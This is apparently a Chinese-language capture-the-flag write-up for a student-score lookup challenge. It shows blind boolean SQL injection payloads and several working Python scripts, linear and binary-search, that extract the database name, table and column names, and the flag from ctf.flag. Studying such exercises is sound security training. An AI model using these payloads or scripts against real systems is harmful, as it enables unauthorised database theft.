打开环境,随便输个1看看
输个2
发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。
当输入的学号不存在时,只会返回“student number not exists.”。
猜测是盲注题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。
先写查询语句
if(ascii(substr(database(),1,1))>1,1,0)
发现回显
爆数据库
import requests
import time
base_url="http://6199a6c3-30ca-4b13-955a-23ee81146566.node4.buuoj.cn:81/?stunum="
data=''
for i in range(1,200): #位数
for j in range(1,128): #ascii码值
payload = "if(ascii(substr(database(),{},1))={},1,0)".format(i,j)
r=requests.get(url=base_url+payload)
if(r.status_code==429): #设置睡眠
time.sleep(0.5)
if r"Hi admin, your score is: 100" in r.text: #设置成功条件
data+=chr(j)
print(data) 
使用二分法来爆破
import requests
base_url="http://6199a6c3-30ca-4b13-955a-23ee81146566.node4.buuoj.cn:81/?stunum="
data=''
payload="if(ascii(substr(database(),{},1))>{},1,0)"
for i in range(1,10000):
low = 32
high = 128
mid =(low + high) // 2
while(low < high):
payload1=payload.format(i,mid)
r = requests.get(url=base_url+payload1)
if "Hi admin, your score is: 100" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if (mid == 32 or mid == 132):
break
data+=chr(mid)
print(data)
爆表
if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)="ctf"),1,1))>1,1,0)flag
爆字段
if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='flag'),1,1)>1,1,0)
flag,value
如果不采用二分法,会跑的很慢
import requests
import time
base_url="http://6199a6c3-30ca-4b13-955a-23ee81146566.node4.buuoj.cn:81/?stunum="
data=''
for i in range(1,200): #位数
for j in range(1,128): #ascii码值
payload = "if(ascii(substr(database(),{},1))={},1,0)".format(i,j)
payload2 = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)="ctf"),{},1))={},1,0)'.format(i,j)
payload3="if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='flag'),{},1))={},1,0)".format(i,j)
payload4="if(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))={},1,0)".format(i,j)
r=requests.get(url=base_url+payload4)
if(r.status_code==429): #设置睡眠
time.sleep(0.5)
if r"Hi admin, your score is: 100" in r.text: #设置成功条件
data+=chr(j)
print(data)最后脚本
import requests
import time
url = "http://1add8b29-2363-4589-a08f-89fde2996fef.node4.buuoj.cn:81/?stunum="
result = ""
i = 0
while (True):
i = i + 1
low = 32
high = 127
while (low < high):
mid = (low + high) >> 1
# payload = "1*(ord(substr(database(), %d,1))>%d)" % (i, mid)
# payload = "1*(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)" % (i , mid)
# payload = "1*(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)" % (i, mid)
payload = "1*(ord(substr((select(group_concat(value))from(ctf.flag)),%d,1))>%d)" % (i, mid)
r = requests.get(url + payload)
time.sleep(0.5)
r.encoding = "utf-8"
# print(url+payload)
if "your score is: 100" in r.text:
low = mid + 1
else:
# print(r.text)
high = mid
last = result
if low != 32:
result += chr(low)
else:
break
print(result)
